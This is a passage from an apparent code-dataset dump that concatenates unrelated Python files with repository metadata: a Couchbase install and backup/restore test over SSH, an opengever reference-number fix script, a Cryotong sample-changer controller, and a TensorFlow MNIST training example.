command2 = "dpkg-deb -x couchbase-server-enterprise_x86_64_2.2.0-772-rel.deb /home/{0}".format(server.ssh_username)
command3 = "cd /home/{0}/opt/couchbase && ./bin/install/reloc.sh `pwd`".format(server.ssh_username)
command4 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -- -noinput -detached".format(server.ssh_username)
command5 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
o, e = shell.execute_non_sudo_command(command0)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command1)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command2)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command3)
shell.log_command_output(o, e)
self.log.info("Starting couchbase server <non-root, non-sudo> ..")
o, e = shell.execute_non_sudo_command(command4)
shell.log_command_output(o, e)
self.fail("TODO: Add instructions for ubuntu")
elif self._os == "windows":
self.fail("TODO: Add instructions for windows")
else:
self.fail("Enter valid os name, options: centos, ubuntu, windows; entered name: {0} - invalid.".format(self._os))
ssh_client.close()
"""
Method that initializes cluster, rebalances in nodes, and creates a standard bucket
"""
def init_rebalance_cluster_create_testbucket(self):
shell = RemoteMachineShellConnection(self.master)
if self._os == "centos" or self._os == "ubuntu":
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli cluster-init -c localhost:8091"
_3 = " --cluster-init-username={0} --cluster-init-password={1}".format(self.master.rest_username, self.master.rest_password)
_4 = " --cluster-init-port=8091 --cluster-init-ramsize=1000"
command_to_init = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_init)
shell.log_command_output(o, e)
time.sleep(10)
for i in range(1, len(self.servers)):
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli server-add -c {1}:8091".format(self.master.ip)
_3 = " --server-add={2}:8091".format(self.servers[i].ip)
_4 = " --server-add-username={3}".format(self.servers[i].rest_username)
_5 = " --server-add-password={4}".format(self.servers[i].rest_password)
_6 = " -u {0} -p {1}".format(self.servers[i].rest_username, self.servers[i].rest_password)
command_to_rebalance = _1 + _2 + _3 + _4 + _5 + _6
o, e = shell.execute_non_sudo_command(command_to_rebalance)
shell.log_command_output(o, e)
time.sleep(10)
if len(self.servers) < 2:
rep_count = 0
else:
rep_count = 1
self.log.info("Cluster set up, now creating a bucket ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-create -c localhost:8091"
_3 = " --bucket=testbucket --bucket-type=couchbase --bucket-port=11211"
_4 = " --bucket-ramsize=500 --bucket-replica={0} --wait".format(rep_count)
_5 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_create_bucket = _1 + _2 + _3 + _4 + _5
o, e = shell.execute_non_sudo_command(command_to_create_bucket)
shell.log_command_output(o, e)
time.sleep(30)
elif self._os == "windows":
# TODO: Windows support
pass
"""
Test loads a certain number of items on a standard bucket created
using couchbase-cli and later verifies if the number matches what's expected.
"""
def test_create_bucket_test_load(self):
shell = RemoteMachineShellConnection(self.master)
self.init_rebalance_cluster_create_testbucket()
if self._os == "centos" or self._os == "ubuntu":
self.log.info("Load {0} through cbworkloadgen ..".format(self.num_items))
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbworkloadgen -n localhost:8091"
_3 = " -r .8 -i {0} -s 256 -b testbucket -t 1".format(self.num_items)
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_load = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_load)
shell.log_command_output(o, e)
time.sleep(20)
rest = RestConnection(self.master)
item_count = rest.fetch_bucket_stats(bucket="testbucket")["op"]["samples"]["curr_items"][-1]
if (item_count == self.num_items):
self.log.info("Item count matched, {0}={1}".format(item_count, self.num_items))
else:
self.fail("Item count: Not what's expected, {0}!={1}".format(item_count, self.num_items))
self.log.info("Deleting testbucket ..");
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-delete -c localhost:8091"
_3 = " --bucket=testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_delete_bucket = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_delete_bucket)
shell.log_command_output(o, e)
time.sleep(10)
elif self._os == "windows":
# TODO: Windows support
self.log.info("Yet to add support for windows!")
pass
"""
Test that loads a certain number of items, backs up, deletes bucket,
recreates bucket, restores, and verifies if count matched.
"""
def test_bucket_backup_restore(self):
shell = RemoteMachineShellConnection(self.master)
self.init_rebalance_cluster_create_testbucket()
if self._os == "centos" or self._os == "ubuntu":
self.log.info("Load {0} through cbworkloadgen ..".format(self.num_items))
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbworkloadgen -n localhost:8091"
_3 = " -r .8 -i {0} -s 256 -b testbucket -t 1".format(self.num_items)
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_load = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_load)
shell.log_command_output(o, e)
time.sleep(20)
rest = RestConnection(self.master)
ini_item_count = rest.fetch_bucket_stats(bucket="testbucket")["op"]["samples"]["curr_items"][-1]
self.log.info("Backing up bucket 'testbucket' ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbbackup http://localhost:8091"
_3 = " /home/{0}/backup".format(self.master.ssh_username)
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_backup = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_backup)
shell.log_command_output(o, e)
time.sleep(10)
self.log.info("Deleting bucket ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-delete -c localhost:8091"
_3 = " --bucket=testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_delete_bucket = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_delete_bucket)
shell.log_command_output(o, e)
time.sleep(20)
if len(self.servers) < 2:
rep_count = 0
else:
rep_count = 1
self.log.info("Recreating bucket ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-create -c localhost:8091"
_3 = " --bucket=testbucket --bucket-type=couchbase --bucket-port=11211"
_4 = " --bucket-ramsize=500 --bucket-replica={0} --wait".format(rep_count)
_5 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_create_bucket = _1 + _2 + _3 + _4 + _5
o, e = shell.execute_non_sudo_command(command_to_create_bucket)
shell.log_command_output(o, e)
time.sleep(20)
self.log.info("Restoring bucket 'testbucket' ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbrestore /home/{0}/backup http://localhost:8091".format(self.master.ssh_username)
_3 = " -b testbucket -B testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_restore = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_restore)
shell.log_command_output(o, e)
time.sleep(10)
rest = RestConnection(self.master)
fin_item_count = rest.fetch_bucket_stats(bucket="testbucket")["op"]["samples"]["curr_items"][-1]
self.log.info("Removing backed-up folder ..")
command_to_remove_folder = "rm -rf /home/{0}/backup".format(self.master.ssh_username)
o, e = shell.execute_non_sudo_command(command_to_remove_folder)
shell.log_command_output(o, e)
if (fin_item_count == ini_item_count):
self.log.info("Item count before and after deleting with backup/restore matched, {0}={1}".format(
fin_item_count, ini_item_count))
else:
self.fail("Item count didnt match - backup/restore, {0}!={1}".format(fin_item_count, ini_item_count))
self.log.info("Deleting testbucket ..");
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-delete -c localhost:8091"
_3 = " --bucket=testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_delete_bucket = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_delete_bucket)
shell.log_command_output(o, e)
time.sleep(10)
elif self._os == "windows":
# TODO: Windows support
self.log.info("Yet to add support for windows!")
pass
| [
"abhinav.dangeti@gmail.com"
] | abhinav.dangeti@gmail.com |
5ef8097cf66e2db0fa6b7d8d2d11a22a0d3f97e1 | ce75bce747bf60b364bc2e516824fc69c64a7eec | /opengever/maintenance/scripts/archive/04_fix_ai_refnums.py | ede9e2ca2e686c1b7c72846ef4c543e7a57ffdfb | [] | no_license | 4teamwork/opengever.maintenance | c94e470af31f891d0969877533e5acd37369f70f | f2b9866fb6cce1d24e29b084b757eec857119479 | refs/heads/master | 2023-07-28T17:57:09.619138 | 2023-07-14T13:08:20 | 2023-07-14T13:08:20 | 14,493,557 | 2 | 0 | null | 2023-08-31T09:07:21 | 2013-11-18T13:46:30 | Python | UTF-8 | Python | false | false | 6,511 | py | from Acquisition import aq_inner
from Acquisition import aq_parent
from opengever.base.adapters import CHILD_REF_KEY
from opengever.base.adapters import DOSSIER_KEY
from opengever.base.adapters import PREFIX_REF_KEY
from opengever.base.adapters import REPOSITORY_FOLDER_KEY
from opengever.base.interfaces import IReferenceNumberFormatter
from opengever.base.interfaces import IReferenceNumberPrefix
from opengever.base.interfaces import IReferenceNumberSettings
from opengever.dossier.behaviors.dossier import IDossierMarker
from opengever.dossier.templatedossier import ITemplateDossier
from opengever.maintenance.debughelpers import setup_app
from opengever.maintenance.debughelpers import setup_plone
from opengever.repository.interfaces import IRepositoryFolder
from opengever.repository.repositoryroot import IRepositoryRoot
from opengever.task.task import ITask
from plone import api
from plone.registry.interfaces import IRegistry
from zope.annotation.interfaces import IAnnotations
from zope.app.intid.interfaces import IIntIds
from zope.component import getUtility
from zope.component import queryAdapter
import transaction
SEPARATOR = '-' * 78
class ReferenceNumberHelper(object):
"""Helper class for dealing with reference numbers.
"""
def __init__(self, log_func, site):
self.log = log_func
self.site = site
def get_repo_dossier_separator(self, obj=None):
registry = getUtility(IRegistry)
proxy = registry.forInterface(IReferenceNumberSettings)
formatter = queryAdapter(obj,
IReferenceNumberFormatter,
name=proxy.formatter)
return formatter.repository_dossier_seperator
def get_new_mapping(self, key, obj):
parent = aq_parent(aq_inner(obj))
ann = IAnnotations(parent)
if IDossierMarker.providedBy(obj):
mapping_base = ann.get(DOSSIER_KEY)
elif IRepositoryFolder.providedBy(obj) or IRepositoryRoot.providedBy(obj):
mapping_base = ann.get(REPOSITORY_FOLDER_KEY)
else:
raise Exception("Unknown object type!")
if not mapping_base:
return None
mapping = mapping_base.get(key)
return mapping
class ReferenceNumberFixer(object):
"""This is the fix for some previously run fixscripts.
It attempts to fix broken reference numbers. A new reference number has
been generated by mistake while moving content. Some fix-scrips have then
attempted to revert these reference numbers to their previous state. This
seems to have failed in come cases:
The reference numbers are now in an inconsistent state and have different
values in child_mapping and prefix_mapping. This script reverts the
reference numbers to the state as defined in child_mapping. If multiple
values are defined in child_mapping it takes the higher (later) one.
"""
def __init__(self, log_func, site):
self.catalog = api.portal.get_tool('portal_catalog')
self.parent_logger = log_func
self.site = site
self.helper = ReferenceNumberHelper(log_func, site)
self.intids = getUtility(IIntIds)
self.ignored_ids = ['vorlagen']
self.objs_to_reindex = set()
def log(self, msg):
msg = " " + msg
return self.parent_logger(msg)
def _fix_wrong_mappings(self, obj):
"""Detect the following errors:
- entry of reference number in prefix_mapping available
- no entry in child_mapping for that refernece numbers, but for
other (previous) reference numbers for that content object
"""
parent = aq_parent(aq_inner(obj))
local_number = IReferenceNumberPrefix(parent).get_number(obj)
intid = self.intids.getId(obj)
try:
child_mapping = self.helper.get_new_mapping(CHILD_REF_KEY, obj)
prefix_mapping = self.helper.get_new_mapping(PREFIX_REF_KEY, obj)
has_child_mapping = child_mapping.get(local_number) == intid
has_prefix_mapping = prefix_mapping.get(intid) == local_number
is_assigned_a_refnum = intid in set(child_mapping.values())
if not has_child_mapping:
if is_assigned_a_refnum:
self._revert_to_refnum_in_child_mapping(
obj, parent, local_number, intid, child_mapping, prefix_mapping)
else:
self.log("WARNING: obj %s not in child mapping of parent!" % obj)
if not has_prefix_mapping:
self.log("WARNING: obj %s not in prefix mapping of parent!" % obj)
except Exception, e:
self.log("WARNING: '%s' for %s" % (e, obj))
def _revert_to_refnum_in_child_mapping(self, obj, parent, local_number, intid, child_mapping, prefix_mapping):
previous_refnums = []
for key, value in child_mapping.iteritems():
if value == intid:
previous_refnums.append(key)
max_previous_refnum = unicode(max(map(int, previous_refnums)))
assert int(local_number) > int(max_previous_refnum)
# revert refnum to previous entry
prefix_mapping[intid] = max_previous_refnum
self.log("INFO: reverted %s (%s) from %s to %s" % (obj, intid, local_number, max_previous_refnum))
assert IReferenceNumberPrefix(parent).get_number(obj) == max_previous_refnum
for brain in self.catalog(path='/'.join(obj.getPhysicalPath())):
self.objs_to_reindex.add(brain.getObject())
def fix_child_mappings(self):
dossier_brains = self.catalog(object_provides=IDossierMarker.__identifier__)
for brain in dossier_brains:
obj = brain.getObject()
if ITemplateDossier.providedBy(obj):
continue
if obj.id in self.ignored_ids:
continue
self._fix_wrong_mappings(obj)
for obj in self.objs_to_reindex:
obj.reindexObject(idxs=['reference'])
if ITask.providedBy(obj):
obj.get_sql_object().sync_with(obj)
def main():
app = setup_app()
print SEPARATOR
plone = setup_plone(app, [])
# prevents erroneous execution
transaction.doom()
def log(msg):
print msg
fixer = ReferenceNumberFixer(log, plone)
print "Running 'fixing broken mappings'..."
fixer.fix_child_mappings()
print "Done"
if __name__ == '__main__':
main()
| [
"david.erni@4teamwork.ch"
] | david.erni@4teamwork.ch |
9cb456489d73565f68a676b9d586e0b24fee5b75 | 4486fd77358c3af2f526de28e30455270a5f2626 | /2.7.py | b1b99ae3bcabf7182b74a91105c5645db5b870ea | [] | no_license | genius-2/python-files | 3e8d80e9cfb769edf3508eb531c98e6643b5a7d8 | 72a3dadd228651d5b713c5a2f4c960b2d917039e | refs/heads/master | 2023-02-04T18:29:51.535033 | 2020-12-27T17:45:11 | 2020-12-27T17:45:11 | 299,374,875 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | def day(l):
day=(l+1)%7
return day
l=int(input())
print(day(l))
print("type 'end' to exit ")
e=str(input()) | [
"noreply@github.com"
] | genius-2.noreply@github.com |
6ba303e63bec1428c6372c304442635b1df11e41 | 596f7d48f5f961234b9f1771fdd055c33f234ddd | /HardwareObjects/SOLEIL/PX1/PX1Cryotong.py | 555fb99408359f44ae49e876406ae19ad694a51c | [] | no_license | schurmann/HardwareRepository | d0cf468c42b04e19e54fdd837074d1fe4ea66a0a | 8ab972c42b89d953b897b9745edec7156b156103 | refs/heads/master | 2020-04-06T23:04:28.098436 | 2018-11-15T16:25:29 | 2018-11-15T16:25:29 | 157,857,021 | 0 | 0 | null | 2018-11-16T11:15:59 | 2018-11-16T11:15:59 | null | UTF-8 | Python | false | false | 10,250 | py |
import logging
import gevent
import time
from HardwareRepository.Command.Tango import DeviceProxy
from Cats90 import Cats90, SampleChangerState
from Cats90 import BASKET_UNIPUCK
from PX1Environment import EnvironmentPhase
class PX1Cryotong(Cats90):
__TYPE__ = "CATS"
default_no_lids = 1
baskets_per_lid = 3
default_basket_type = BASKET_UNIPUCK
def __init__(self, *args, **kwargs):
super(PX1Cryotong, self).__init__( *args, **kwargs)
self._safeNeeded = None
self._homeOpened = None
self.dry_and_soak_needed = False
self.count_down = None
self.soft_auth = None
self.incoherent_state = None
def init(self):
super(PX1Cryotong,self).init()
self.cats_device = DeviceProxy(self.getProperty("cats_device"))
self.environment = self.getObjectByRole("environment")
if self.environment is None:
logging.error("PX1Cats. environment object not available. Sample changer cannot operate. Info.mode only")
self.infomode = True
else:
self.infomode = False
for channel_name in ("_chnSoftAuth","_chnHomeOpened", \
"_chnDryAndSoakNeeded", "_chnIncoherentGonioSampleState",
"_chnSampleIsDetected", "_chnCountDown"):
setattr(self, channel_name, self.getChannelObject(channel_name))
self._chnSoftAuth.connectSignal("update", self._softwareAuthorization)
self._chnHomeOpened.connectSignal("update", self._updateHomeOpened)
self._chnIncoherentGonioSampleState.connectSignal("update", self._updateAckSampleMemory)
self._chnDryAndSoakNeeded.connectSignal("update",self._dryAndSoakNeeded)
self._chnSampleIsDetected.connectSignal("update",self._updateSampleIsDetected)
self._chnCountDown.connectSignal("update", self._updateCountDown)
self._cmdDrySoak = self.addCommand({
"type": "tango",
"name": "_cmdDrySoak",
"tangoname": self.tangoname,
}, "DryAndSoak")
### CRYOTONG SPECIFIC METHODS ###
def _softwareAuthorization(self, value):
if value != self.soft_auth:
self.soft_auth = value
self.emit("softwareAuthorizationChanged", (value,))
def _updateHomeOpened(self, value=None):
if self._homeOpened != value:
self._homeOpened = value
self.emit('homeOpened', (value, ))
def _updateSampleIsDetected(self, value):
self.emit('sampleIsDetected', (value, ))
def _updateAckSampleMemory(self, value=None):
if value is None:
value = self._chnIncoherentGonioSampleState.getValue()
if value != self.incoherent_state:
# automatically acknowledge the error. send a warning to the GUI
if self.incoherent_state is not None:
logging.getLogger('user_level_log').warning("CATS: Requested Sample could not be loaded.")
self.emit('loadError', value)
try:
self._cmdAckSampleMemory()
except:
""" do nothing if cmd not to acknowledge not in xml """
pass
self.incoherent_state = value
def _dryAndSoakNeeded(self, value=None):
self.dry_and_soak_needed = value
def do_dryAndSoak(self):
homeOpened = self._chnHomeOpened.getValue()
if not homeOpened:
self._doDrySoak()
else:
logging.getLogger('user_level_log').warning("CATS: You must Dry_and_Soak the gripper.")
def _updateCountDown(self, value=None):
if value is None:
value = self._chnCountDown.getValue()
if value != self.count_down:
logging.getLogger("HWR").info("PX1Cats. CountDown changed. Now is: %s" % value)
self.count_down = value
self.emit("countdownSignal", value)
def _doDrySoak(self):
"""
Launch the "DrySoak" command on the CATS Tango DS
:returns: None
:rtype: None
"""
if self.infomode:
logging.warning("PX1Cats. It is in info mode only. DrySoak command ignored")
return
self._cmdDrySoak()
def _doSafe(self):
"""
Launch the "safe" trajectory on the CATS Tango DS
:returns: None
:rtype: None
"""
if self.infomode:
logging.warning("PX1Cryotong. It is in info mode only. Command 'safe' ignored" )
return
ret = self.env_send_transfer()
if not ret:
logging.getLogger("user_level_log").error("PX1 Environment cannot set transfer phase")
raise Exception("Cryotong cannot get to transfer phase. Aborting sample changer operation")
self._executeServerTask(self._cmdSafe, "Safe", states=[SampleChangerState.Ready, SampleChangerState.Alarm])
### (END) CRYOTONG SPECIFIC METHODS ###
### OVERLOADED CATS90 methods ####
def cats_pathrunning_changed(self, value):
Cats90.cats_pathrunning_changed(self, value)
if self.cats_running is False and self.dry_and_soak_needed:
self.do_dryAndSoak()
def _doLoad(self, sample=None, wash=None):
ret = self.check_power_on()
if ret is False:
logging.getLogger("user_level_log").error("CRYOTONG Cannot be powered")
raise Exception("CRYOTONG Cannot be powered. Aborting sample changer operation")
ret = self.check_drysoak()
if ret is False:
logging.getLogger("user_level_log").error("CRYOTONG Home Open / DryAndSoak not valid for loading")
raise Exception("CRYOTONG Home Open / DryAndSoak not valid for loading")
ret = self.env_send_transfer()
if ret is False:
logging.getLogger("user_level_log").error("PX1 Environment cannot set transfer phase")
raise Exception("Cryotong cannot get to transfer phase. Aborting sample changer operation")
self._doLoadOperation(sample)
# Check the value of the CATSCRYOTONG attribute dryAndSoakNeeded to warn user if it is True
dryAndSoak = self._chnDryAndSoakNeeded.getValue()
if dryAndSoak:
logging.getLogger('user_level_log').warning("CATS: It is recommended to Dry_and_Soak the gripper.")
incoherentSample = self._chnIncoherentGonioSampleState.getValue()
if incoherentSample:
logging.getLogger("user_level_log").info("CATS: Load/Unload Error. Please try again.")
self.emit('loadError', incoherentSample)
def _doUnload(self,sample=None,wash=None):
ret = self.check_power_on()
if ret is False:
logging.getLogger("user_level_log").error("CRYOTONG Cannot be powered")
raise Exception("CRYOTONG Cannot be powered. Aborting sample changer operation")
ret = self.env_send_transfer()
if ret is False:
logging.getLogger("user_level_log").error("PX1 Environment cannot set transfer phase")
raise Exception("Cryotong cannot get to transfer phase. Aborting sample changer operation")
self._doUnloadOperation(sample)
def check_power_on(self):
if self._chnPowered.getValue():
return True
self._cmdPowerOn()
timeout = 3
t0 = time.time()
while not self._chnPowered.getValue():
gevent.sleep(0.3)
if time.time() - t0 > timeout:
logging.getLogger('HWR').warning("CRYOTONG: timeout waiting for power on")
break
if self._chnPowered.getValue():
return False
return True
def check_drysoak(self):
if self._chnHomeOpened.getValue() is False:
return True
#
self._cmdDrySoak()
time.sleep(3)
t0 = time.time()
wait_n = 0
while self._isDeviceBusy():
if wait_n % 10 == 3:
logging.getLogger('HWR').warning("CRYOTONG: waiting for dry and soak to complete")
gevent.sleep(0.3)
wait_n += 1
if self._isDeviceReady() and self._chnHomeOpened.getValue() is False:
return True
else:
return False
def env_send_transfer(self):
if self.environment.readyForTransfer():
return True
logging.getLogger('user_level_log').warning("CRYOTONG: Not ready for transfer. sending it")
self.environment.setPhase(EnvironmentPhase.TRANSFER)
timeout = 10
t0 = time.time()
while not self.environment.readyForTransfer():
gevent.sleep(0.3)
if time.time() - t0 > timeout:
logging.getLogger('HWR').warning("CRYOTONG: timeout waiting for transfer phase")
break
logging.getLogger('HWR').warning("CRYOTONG: waiting for transfer phase to be set")
if not self.environment.readyForTransfer():
return False
logging.getLogger('HWR').warning("CRYOTONG: ready for transfer now")
return True
### (END) OVERLOADED CATS90 methods ####
def test_hwo(hwo):
import gevent
basket_list = hwo.getBasketList()
sample_list = hwo.getSampleList()
print("Baskets/Samples in CATS: %s/%s" % ( len(basket_list), len(sample_list)))
gevent.sleep(2)
sample_list = hwo.getSampleList()
print "No of samples is ", len(sample_list)
for s in sample_list:
if s.isLoaded():
print "Sample %s loaded" % s.getAddress()
break
if hwo.hasLoadedSample():
print "Currently loaded (%s): %s" % (hwo.hasLoadedSample(),hwo.getLoadedSample().getAddress())
print "\nCATS model is: ", hwo.cats_model
print "CATS state is: ", hwo.state
print "Sample on Magnet : ", hwo.cats_sample_on_diffr()
print "All lids closed: ", hwo._chnAllLidsClosed.getValue()
print "Sample Changer State is: ", hwo.getStatus()
for basketno in range(hwo.number_of_baskets):
no = basketno +1
print "Tool for basket %d is: %d" % (no, hwo.tool_for_basket(no))
| [
"martin.savko@gmail.com"
] | martin.savko@gmail.com |
0b4cc930a2d642e1a36e2008dc5158cca775a7ef | 681bd5e9f451dab637c6831a0eee7185851bb967 | /test/5_2.py | 2a9425d56167e89c573e436316a91e1bf1a8b3d1 | [] | no_license | facingwaller/deeplearning | 86796d02ab0e63ec2bdf3a809a6575f93dc11471 | 2b4ada86a2770b25d2c12b80062998557e993cea | refs/heads/master | 2018-12-04T18:09:28.929223 | 2018-11-09T09:40:19 | 2018-11-09T09:40:19 | 111,788,630 | 10 | 3 | null | null | null | null | UTF-8 | Python | false | false | 8,069 | py | # coding=utf-8
# 在MNIST 数据集上实现神经网络
# 包含一个隐层
# 5种优化方案:激活函数,多层隐层,指数衰减的学习率,正则化损失,滑动平均模型
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
INPUT_NODE = 784
OUTPUT_NODE = 10
LAYER1_NODE = 500
BATCH_SIZE = 100
# 基础的学习率,使用指数衰减设置学习率
LEARNING_RATE_BASE = 0.8
# 学习率的初始衰减率
LEARNING_RATE_DECAY = 0.99
# 正则化损失的系数
LAMADA = 0.0001
# 训练轮数
TRAINING_STEPS = 30000
# 滑动平均衰减率
MOVING_AVERAGE_DECAY = 0.99
# 生成权重变量,并加入L2正则化损失到losses集合里
def get_weight(shape, Lamada):
weights = tf.Variable(tf.truncated_normal(shape, stddev=0.1))
if Lamada != None:
tf.add_to_collection('losses', tf.contrib.layers.l2_regularizer(Lamada)(weights))
return weights
# 对神经网络进行前向计算,有两个版本,包含滑动平均以及不包含滑动平均
# 使用了RELU激活函数实现了去线性化,函数支持传入计算参数平均的类,便于测试时使用滑动平均模型·
# 将 weights1, biases1 所组成的激活函数算好后作为下一个的输入
def inference(input_tensor, avg_class, weights1, biases1, weights2, biases2):
if avg_class == None:
layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)
# 计算输出层的前向传播结果。因为在计算损失函数的时候会一并计算softmax函数,因此这里不加入softmax函数
# 同时,这里不加入softmax层不会影响最后的结果。
# 因为,预测时使用的是不同类别对应节点输出值的相对大小,因此有无softmax层对最后的结果没有影响。
# 因此在计算神经网络的前向传播时可以不用加入最后的softmax层
return tf.matmul(layer1, weights2) + biases2
else:
# 首先需要使用avg_class.average函数计算变量的滑动平均值,然后再计算相应的神经网络前向传播结果
# tf.nn.relu 一种激活函数tf.nn.relu(features, name=None) 与 sigmoid 是同一种东西
layer1 = tf.nn.relu(
tf.matmul(input_tensor, avg_class.average(weights1)) + avg_class.average(biases1))
return tf.matmul(layer1, avg_class.average(weights2)) + avg_class.average(biases2)
# 训练模型的过程
def train(mnist):
x = tf.placeholder(tf.float32, shape=(None, INPUT_NODE), name='x_input')
y_ = tf.placeholder(tf.float32, shape=(None, OUTPUT_NODE), name='y_input')
# 生成隐藏层的参数
weights1 = get_weight([INPUT_NODE, LAYER1_NODE], LAMADA)
biaes1 = tf.Variable(tf.constant(0.1, shape=[LAYER1_NODE]))
# 生成输出层的参数
weights2 = get_weight([LAYER1_NODE, OUTPUT_NODE], LAMADA)
biaes2 = tf.Variable(tf.constant(0.1, shape=[OUTPUT_NODE]))
# 计算神经网络的前向传播结果,注意滑动平均的类函数为None
y = inference(x, None, weights1, biaes1, weights2, biaes2)
# 定义存储模型训练轮数的变量,并指明为不可训练的参数
global_step = tf.Variable(0, trainable=False)
# 初始化滑动平均的函数类,加入训练轮数的变量可以加快训练早期变量的更新速度
variable_averages = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, global_step)
# 对神经网络里所有可训练参数(列表)应用滑动平均模型,每次进行这个操作,列表里的元素都会得到更新
variable_averages_op = variable_averages.apply(tf.trainable_variables())
# 计算使用了滑动平均的网络前向传播结果,滑动平均buri改变变量本身的值,而是维护一个影子变量来记录其滑动平均值
# 因此当需要使用这个滑动平均值的时候,需要明确调用average函数
average_y = inference(x, variable_averages, weights1, biaes1, weights2, biaes2)
# 当只有一个标准答案的时候,使用sprase_softmax_cross_entropy_with_logits计算损失,可以加速计算
# 参数:不包含softmax层的前向传播结果,训练数据的正确答案
# 因为标准答案是一个长度为10的一维数组,而该函数需要提供一个正确答案的数字,
# 因此需要使用tf.argmax函数得到正确答案的对应类别编号
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=tf.argmax(y_, 1))
# 计算在当前batch里所有阳历的交叉熵平均值,并加入损失集合
cross_entropy_mean = tf.reduce_mean(cross_entropy)
tf.add_to_collection('losses', cross_entropy_mean)
# get_collection返回一个列表,列表是所有这个集合的所有元素
# 在本例中,元素代表了其他部分的损失,加起来就得到了所有的损失
loss = tf.add_n(tf.get_collection('losses'))
# 设置指数衰减的学习率
learning_rate = tf.train.exponential_decay(LEARNING_RATE_BASE, # 基础的学习率,在此基础上进行递减
global_step, # 迭代的轮数
mnist.train.num_examples / BATCH_SIZE, # 所有的数据得到训练所需要的轮数
LEARNING_RATE_DECAY) # 学习率衰减速度
# 使用GradientDescentOptimizer()优化算法的损失函数
train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)
# 在训练神经网络模型的时候,每过一边数据既需要通过反向传播更新网络的参数
# 又需要更新每一个参数的滑动平均值。为了一次完成多种操作,tensroflow提供了两种机制。
# 下面的两行程序和:train_op = tf.group(train_step,variables_average_op)等价
with tf.control_dependencies([train_step, variable_averages_op]):
train_op = tf.no_op(name='train')
# 进行验证集上的准确率计算,这时需要使用滑动平均模型
# 判断两个张量的每一维是否相等,如果相等就返回True,否则返回False
correct_prediction = tf.equal(tf.argmax(average_y, 1), tf.argmax(y_, 1))
# 这个运算先将布尔型的数值转为实数型,然后计算平均值,平均值就是准确率
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# 初始化会话,并开始训练
with tf.Session() as sess:
# init_op = tf.initialize_all_variables()
# sess.run(init_op)
# 初始化所有参数,同上面两句作用一致
# tf.initialize_all_variables().run()
tf.global_variables_initializer().run()
# 准备验证数据,一般在神经网络的训练过程中会通过验证数据来判断大致停止的条件和评判训练的效果
validate_feed = {x: mnist.validation.images, y_: mnist.validation.labels}
# 准备测试数据,在实际中,这部分数据在训练时是不可见的,这个数据只是作为模型优劣的最后评价标准
test_feed = {x: mnist.test.images, y_: mnist.test.labels}
# 迭代的训练神经网络
for i in range(TRAINING_STEPS):
xs, ys = mnist.train.next_batch(BATCH_SIZE)
_, loss_value, step = sess.run([train_op, loss, global_step], feed_dict={x: xs, y_: ys})
if i % 1000 == 0:
print("After %d training step(s), loss on training batch is %g." % (step, loss_value))
validate_acc = sess.run(accuracy, feed_dict=validate_feed)
print("After %d training step(s),validation accuracy using average model is %g " % (step, validate_acc))
test_acc = sess.run(accuracy, feed_dict=test_feed)
print("After %d training step(s) testing accuracy using average model is %g" % (step, test_acc))
def main(argv=None):
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
train(mnist)
if __name__ == '__main__':
tf.app.run()
| [
"facingwaller@gmail.com"
] | facingwaller@gmail.com |
